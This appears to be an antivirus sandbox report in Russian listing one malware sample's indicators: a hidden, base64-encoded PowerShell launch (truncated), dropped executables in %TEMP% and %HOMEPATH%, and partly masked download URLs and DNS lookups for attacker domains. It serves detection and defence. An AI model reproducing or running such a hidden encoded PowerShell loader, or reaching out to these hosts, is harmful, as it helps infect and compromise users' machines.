Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGIAeABnAGUAbgBiAHIAPQAnAE0AaQBrAHcAcABvAG4AbQBhACcAOwAkAFoAbwBzAHAAcgBnAHQAYgBuAG4AIAA9ACAAJwA2ADQAMwAnADsAJABUAG8AYQB3AGoAcgBuAG0AYwBiAD0AJwBXAGIAYgBsAGEAdQBoAGQAYwB0ACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\948813.cvr
- %HOMEPATH%\643.exe
- %HOMEPATH%\643.exe
- 'no###kon.com':80
- 'co####rldinc.com':80
- 'fr#####cedigitales.com':80
- http://no###kon.com/administrator/020/
- http://co####rldinc.com/browse/70676/
- http://co####rldinc.com/cgi-sys/suspendedpage.cgi
- http://fr#####cedigitales.com/keo/ekb98m90542/
- http://fr#####cedigitales.com/
- http://ww#.####lancedigitales.com/
- DNS ASK fo####anderers.com
- DNS ASK no###kon.com
- DNS ASK co####rldinc.com
- DNS ASK fr#####cedigitales.com
- DNS ASK ww#.####lancedigitales.com
- DNS ASK pu###itech.com